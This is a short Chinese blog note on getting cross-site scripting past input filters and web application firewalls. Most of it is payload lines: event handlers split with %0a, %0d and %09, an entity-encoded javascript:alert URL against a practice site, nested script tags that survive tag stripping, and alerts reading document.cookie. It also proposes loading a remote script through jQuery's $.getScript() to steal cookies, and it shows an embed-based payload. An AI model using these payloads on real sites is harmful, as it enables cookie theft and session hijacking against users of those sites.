@1kbfree
2019-08-10T06:49:53.000000Z
字数 1285
阅读 1629
Web安全
xss
漏洞不多介绍,烂大街的~ 这里就讲这么绕过一些过滤
on事件=
比如验证的是如下符号存在就会拦截
onerror=
onclick=
onload=
onxxxxx=
那么我们可以这样子绕过
onerror+=
onerror%0a=
onerror%0d=
onerror%09=
javascript:alert
变成了javascr_ipt:alert
比如如下链接就是这样子过滤的,那么我们可以将其ascii
编码
http://test.xss.tv/level8.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2349%3B%26%2341%3B&submit=添加友情链接
还可以用%09
绕过
javascr%09ipt:alert(1)
还可以%0a、%0d
绕过
<script>
<SCriPt>
)<scr<script>ipt>
,他会把中间的<script>
过滤掉,然后最终变成<script>
)cookie
绕过方法很多站waf
没限制弹窗,但是限制获取cookie
限制原生代码写的远程加载js
文件,那么我们可以利用框架
比如www.a.com
站有jquery
框架,那么我们可以这样子来引入JS
文件来打cookie
,案例如下
jquery
中可以用$.getScript()
函数来引入js
文件
%0a、%0d、%09
在url
解码后都会变为空格,所以我们可以将其加入在js
代码中,就可以达到扰乱一些waf
规则
<script>%09alert%09(1);<script>
<script>%0dalert%0d(1);</script>
<script>%0aalert%0a(1);</script>
<script>alert(document%0a.%09cookie);</script>
<script>alert(%0ddocument%0a.%09cookie);</script>
js
中,函数不仅可以这样
(alert)(1);
还可以这样
(alert)(1);
传参可以这样
alert(1);
还可以这样
alert`1`;
配合空格替代符效果会更好。
embed
解析导致的xss
这个解析的条件得在新浏览器才可以,但是很鸡肋,因为无法打cookie
(因为这个不是目标网站的域),所以只能执行一些其他的js
代码,如跳转,弹窗等,xss payload
如下
<embed src='http://static.zybuluo.com/1kbfree/2o0dq6spzahj8z7yjg64akgp/xss1.pdf'>
如果以后遇到的话会再次更新~